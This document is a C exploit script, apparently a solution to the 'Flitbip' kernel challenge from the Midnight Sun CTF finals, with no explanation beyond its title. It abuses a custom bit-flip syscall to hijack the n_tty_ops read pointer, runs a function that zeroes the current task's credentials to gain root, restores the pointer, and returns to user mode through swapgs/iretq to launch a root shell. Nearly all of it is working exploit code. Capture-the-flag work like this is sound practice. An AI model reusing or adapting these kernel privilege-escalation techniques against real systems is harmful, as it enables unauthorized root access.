Midnight Sun CTF Finals Flitbip

exp.c

#include <stdio.h>
#include <stdio.h>
#include <stdlib.h>

unsigned long* flip_count = 0xFFFFFFFF818F4F78;
unsigned long* n_tty_ops  =0xffffffff8183e320;
unsigned long* n_tty_read = 0xffffffff810c8510;
unsigned long* current_task = 0xffffffff8182e040;


long flitbip(long* addr, long bit) {
    __asm__("mov rax, 333");
    __asm__("syscall");
}


char* user_stack;
unsigned long user_cs;
unsigned long user_ss;
unsigned long user_rflags;

static void save_state() {
    __asm__("mov %0, cs\n"
            "mov %1, ss\n"
            "pushfq\n"
            "popq %2\n"
            :"=r"(user_cs),"=r"(user_ss),"=r"(user_rflags)
            :
            :"memory"
    );
}


void launch_shell(void) {
    system("/bin/sh");
}

void get_root() {
    int * cred = *(unsigned long*)((char*)*current_task + 0x3c0);
    for (int i = 1; i < 9; i++)
        cred[i] = 0;

    *(unsigned long*)((char*)n_tty_ops+0x30) = (unsigned long)n_tty_read;

    __asm__("swapgs\n"
        "mov rax, %0\n"
        "push rax\n"
        "mov rax, %1\n"
        "push rax\n"
        "mov rax, %2\n"
        "push rax\n"
        "mov rax, %3\n"
        "push rax\n"
        "mov rax, %4\n"
        "push rax\n"
        "iretq\n"
        :
        :"r"(user_ss),"r"(user_stack),"r"(user_rflags),"r"(user_cs),"r"(launch_shell)
        :"memory"
    );
}



int main(void) {
    char a;

    user_stack = &a;
    save_state();
    flitbip(flip_count, 63);

    unsigned long val = (unsigned long)get_root ^ (unsigned long)n_tty_read;
    printf("%lx\n", val);
    for (unsigned long i=0; i<64; i++) {
        if (val &  (1ULL << (i)))
            flitbip((char*)n_tty_ops + 0x30  , i);
    }
    scanf("%c", &a);
    while(1);
    return 0;
}